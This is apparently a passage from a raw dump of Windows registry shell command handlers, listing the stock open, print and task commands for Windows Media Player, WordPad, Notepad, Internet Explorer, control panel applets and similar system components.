HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WMZ\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /layout:"%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WPL\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WPL\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WVX\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WVX\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocProtocol.DLNA-PLAYSINGLE\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WMP11.AssocProtocol.MMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021400-0000-0000-C000-000000000046}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN /disablediagnostics HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\telephon.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl,@1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}\Shell\Open\Command (Default) REG_EXPAND_SZ netplwiz.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\Shell\Open\Command (Default) REG_SZ C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\shell32.dll,Control_RunDLL C:\Windows\SysWOW64\inetcpl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B2C761C6-29BC-4f19-9251-E6195265BAF1}\Shell\Open\Command (Default) REG_SZ "C:\Windows\SysWOW64\colorcpl.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\changehomegroupsettings\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\sharewithdevices\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.NetworkAndSharingCenter /page ShareMedia HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\starthomegrouptroubleshooter\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\msdt.exe -id HomegroupDiagnostic HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\viewhomegrouppassword\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup /page Passkey HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.DefaultPrograms HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WPDContextMenu.Url\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Edit\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSFFile\Shell\Print\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\Notepad.exe" /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\WScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WSHFile\Shell\Open2\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\CScript.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\xslfile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\zapfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\Protocols\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Contacts\Address Book\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /showexisting HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Hotmail\Protocols\mailto\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",MailToProtocolHandler %1 HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Hotmail\shell\open\command (Default) REG_EXPAND_SZ %systemRoot%\system32\rundll32.exe "%ProgramFiles%\Internet Explorer\hmmapi.dll",OpenInboxHandler HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\Windows Media Player\shell\open\command (Default) REG_EXPAND_SZ %ProgramFiles(x86)%\Windows Media Player\wmplayer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\naom\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -extoff HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command (Default) REG_SZ C:\Program Files\Internet Explorer\iexplore.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddNetworkLocation\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddPrinter\command (Default) REG_EXPAND_SZ %systemroot%\system32\rundll32.exe printui.dll,PrintUIEntry /il HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.HistoryVaultRestore\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\FileHistory.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\0\{27dfca82-8593-46e4-98d8-23eb83452f65}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewEmail %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\1\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\2\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\3\{9d4b9c0a-7b4e-4c0d-926e-a536d781cff6}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnEdit %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\6\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\7\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\0\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\1\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\2\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\3\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddNetworkLocation\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\CommandStore\shell\Windows.AddPrinter\command (Default) REG_EXPAND_SZ %systemroot%\system32\rundll32.exe printui.dll,PrintUIEntry /il HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\0\{27dfca82-8593-46e4-98d8-23eb83452f65}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewEmail %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\1\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\2\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\3\{9d4b9c0a-7b4e-4c0d-926e-a536d781cff6}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnEdit %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\6\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksItemsSelected\7\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\0\{5099caf3-7ab4-4c18-ab35-3f3e664638e4}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewContact %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\1\{da8c976e-ec82-48ad-8ae4-38872e958dc5}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnNewGroup %* HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\2\{0b51213d-c59c-4b59-bc10-f27d0b330294}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnImport HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\{de2b70ec-9bf7-4a93-bd3d-243f7881d492}\TasksNoItemsSelected\3\{165095b1-322d-47b1-bc9f-2a9234c1c4cb}\shell\InvokeTask\command (Default) REG_EXPAND_SZ rundll32.exe "%CommonProgramFiles%\System\wab32.dll",ShellUICommand_OnExport HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 1 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN /disablediagnostics HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\telephon.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe 